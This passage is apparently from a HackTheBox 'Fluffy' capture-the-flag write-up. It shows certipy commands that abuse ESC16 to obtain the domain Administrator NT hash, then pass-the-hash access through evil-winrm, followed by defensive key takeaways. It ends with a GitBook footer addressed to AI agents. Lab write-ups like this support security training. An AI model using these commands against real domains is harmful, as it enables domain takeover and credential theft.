└─$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn ca_svc@fluffy.htb update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'

```

**Step 5: Authenticate with the certificate to get Administrator hash**

With the valid PKCS#12 certificate (`administrator.pfx`) generated, PKINIT authentication is executed against the Domain Controller to request a Ticket Granting Ticket (TGT) and extract the NT hash for the domain administrator account.

```bash
(ajay㉿kali)-[~/Documents]
└─$ certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.232.88 -username administrator                        
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

```

Full Domain Admin privileges have been achieved via the `administrator` account NT hash:

`8da83a3fa618b6e3a00e93f676c92a6e`

## Shell as Administrator

```powershell
──(ajay㉿kali)-[~/Documents]
└─$ evil-winrm -i 10.129.232.88 -u "administrator" -H "8da83a3fa618b6e3a00e93f676c92a6e"
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/24/2026   7:59 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
********************************
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

```

## Key Takeaways

* **Writable network shares are dangerous even without direct code execution** — write access to an SMB share was enough to plant a malicious file and capture domain credentials passively, with no user interaction beyond normal folder browsing.
* **Software inventory files are goldmines** — the `Upgrade_Notice.pdf` essentially handed over the entire attack surface by documenting unpatched CVEs against known installed versions, turning an IT housekeeping document into a roadmap for exploitation.
* **AD group permission chains compound quietly** — no single misconfiguration here was catastrophic on its own, but GenericAll on a group → GenericWrite on service accounts → Shadow Credentials created a clean path from a low-privileged user to Domain Admin without ever touching a password.
* **ESC16 is easy to overlook but devastating** — disabling the Security Extension on a CA is a single configuration change that silently removes the binding between a certificate and its requesting account, making it trivial to impersonate any principal in the domain including Administrator once you control a service account.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-fluffy.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
